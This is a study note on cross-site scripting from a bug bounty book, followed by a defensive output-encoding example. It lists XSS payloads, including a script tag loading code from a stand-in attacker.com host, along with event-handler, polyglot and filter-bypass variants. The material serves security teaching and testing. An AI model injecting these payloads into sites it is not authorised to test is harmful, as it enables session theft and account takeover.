
Cross-Site Scripting (XSS)

This is a short note on the topic of XSS from the book Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities by Vickie Li.

2 min read · Aug 29, 2025


Cross-Site Scripting (XSS) is one of the most common and impactful web vulnerabilities. Despite modern defenses, it still appears frequently in bug bounty programs and real-world applications.

This report explains the mechanism, types, hunting methodology, bypasses, and attack escalation in a structured, beginner-friendly way.

What is XSS?

Websites are built on HTML, CSS, and JavaScript.

  • If you inject only HTML tags (like <h1>, <u>, <i>), it’s called HTML Injection.
  • But if you manage to inject and execute JavaScript code in a victim’s browser, it becomes an XSS vulnerability.

👉 Example payloads:

<script>alert("XSS")</script>
<script src="http://attacker.com/xss.js"></script>
<script>location="http://attacker.com"</script>

Here:

  • <script> is the HTML container.
  • alert() and location= are the JavaScript payloads.

TYPES OF XSS

[Image: XSS TYPES]

⚠️ Note: Self-XSS is not accepted in bug bounty programs.

XSS Hunting Methodology

Central Principle: Check for Reflected User Input

Step 1: Find Input Opportunities

  • Look at search bars, comments, forms, reviews, etc.
  • Don’t ignore drop-downs or numeric fields (e.g., age). Use Burp Suite to modify the request directly:

POST /edit_user_age
age=<script>alert('XSS')</script>

👉 Tip: Always view source code to confirm where your input appears.

Step 2: Insert Payloads

  • Simple payloads like <script>alert(1)</script> rarely work on modern apps.
  • Try event handlers instead:
<img src=x onerror=alert('XSS')>
<img onload=alert("Loaded!") src="image.png">
<a href="javascript:alert('XSS')">Click me!</a>
  • Use data schemes:
data:text/html,<script>alert('XSS')</script>
  • Use polyglot payloads to test multiple contexts at once:
"><svg onload=alert(1)>

👉 If payloads fail, Inspect → Console to debug syntax errors.

Step 3: Confirm the Impact

  • Did the payload run?
  • Who does it affect? (User vs. Admin?)
  • Does it persist or require a crafted URL?

Impact validation is critical for bug bounty severity.

Bypassing XSS Protections

Websites often filter input. Here’s how to bypass common protections:

1. Alternative Syntax

<img src=x onerror="alert(1)">
<a href="javascript:alert(1)">Click me!</a>

2. Capitalization & Encoding

<scrIPT>alert(1)</scrIPT>
<script>window[String.fromCharCode(97,108,101,114,116)](1)</script>

3. Filter Logic Errors

<scrip<script>t>alert(1)</scrip</script>t>

My Improved XSS Testing Workflow

  1. Enumerate all possible input vectors.
  2. Test with KXSS or Polyglot payloads to check protections.
  3. Debug payloads with console errors.
  4. Modify payloads intelligently based on filters.

Key Takeaways

  • XSS is still one of the most frequent vulnerabilities.
  • Always think in terms of contexts (HTML, attributes, JavaScript, URL).
  • Debugging and bypassing filters is often the real challenge.
  • A properly executed XSS can lead to full account takeover.
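The "think in contexts" takeaway is easiest to see from the defender's side. The following is an added example, not code from the book or the post: a context-aware output encoder for the HTML and URL contexts, a deliberately naive blacklist filter of the kind the "Filter Logic Errors" bypass defeats, and a static check for whether injected markup survived rendering. All function names are my own; the sample inputs are the post's own payloads, embedded here as string literals.

```javascript
// Added example (not from the book or the post): context-aware output encoding,
// the defence that makes the payloads above inert. Names are my own; the
// sample inputs are the post's payloads, constructed here as string literals.

// HTML text and quoted-attribute contexts: encode the five metacharacters.
function encodeForHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(input).replace(/[&<>"']/g, (c) => map[c]);
}

// URL context (href/src): encoding is not enough, because javascript: and
// data: are valid URLs. Allow only http(s); anything else becomes an inert '#'.
function safeHref(input) {
  try {
    const u = new URL(String(input), 'https://placeholder.invalid/');
    return u.protocol === 'http:' || u.protocol === 'https:' ? String(input) : '#';
  } catch {
    return '#';
  }
}

// A blacklist filter of the kind the "Filter Logic Errors" section defeats:
// it strips <script> tags once, non-recursively, and touches nothing else.
function naiveStripScript(input) {
  return String(input).replace(/<\/?script[^>]*>/gi, '');
}

// Renders a search-page fragment that reflects the term into a quoted
// attribute and into text, using whichever "protection" is passed in.
function renderSearch(term, protect) {
  return `<input value="${protect(term)}"><p>Results for ${protect(term)}</p>`;
}

// Static version of step 3 ("did the payload run?"): the template contains
// exactly three tag openers (<input, <p, </p); any extra one came from input.
function injectedTagCount(html) {
  return (html.match(/<[a-z\/]/gi) || []).length - 3;
}
```

Run with the polyglot from step 2, the naive filter lets two extra tags through while the encoder lets none; run on the nested `<scrip<script>t>` payload, the single-pass filter reassembles a working `<script>` tag, which is why encoding on output beats blacklisting on input.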
